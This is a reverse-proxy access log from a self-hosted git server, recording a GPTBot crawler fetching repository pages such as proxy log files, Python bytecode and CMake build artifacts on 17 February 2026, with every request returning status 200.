"/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 21360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 3774907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 2931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 158478] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 21088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 2435] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 1405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 2435] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10965] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:16:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9938] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:16:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11491] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10311] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11171] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10270] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15264] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15264] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11492] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13302] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13303] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11168] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11491] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33667] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10013] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33375] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:16:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10013] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:16:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" -[17/Feb/2026:16:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43102] [Gzip 19.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 27620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 42452] [Gzip 19.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:16:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10527] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:16:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21737] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr 